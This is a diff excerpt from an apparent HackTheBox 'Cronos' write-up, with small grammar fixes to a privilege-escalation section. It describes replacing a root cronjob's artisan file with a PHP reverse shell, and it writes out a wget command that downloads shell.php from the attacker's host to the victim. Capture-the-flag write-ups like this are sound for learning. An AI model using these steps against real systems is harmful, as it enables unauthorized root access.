Leo-2807/Writeups/HackTheBox/cronos.md

 Running linpeas I found that `/var/www/laravel/artisan` is run as cronjob.

-On doing google search I found this very helpful [article](https://fieldraccoon.github.io/posts/Linuxprivesc/) to gain shell as root.
+On doing google search I found this very helpful [article](https://fieldraccoon.github.io/posts/Linuxprivesc/) to gain a shell as root.

 So we need to upload a reverse shell and change it's name to `artisan` .
 Since our reverse shell is also a php file it will be executed and we'll get a shell as root.

-I start a http server on my machine using command `python -m SimpleHTTPServer` and then used the command 'wget http://10.10.14.5:8000/shell.php' to download the shell on out victim machine.
+I start a http server on my machine using command `python -m SimpleHTTPServer` and then used the command 'wget http://10.10.14.5:8000/shell.php' to download the shell on the victim machine.

 ```bash
 www-data@cronos:/var/www/laravel$ wget http://10.10.14.5:8000/shell.php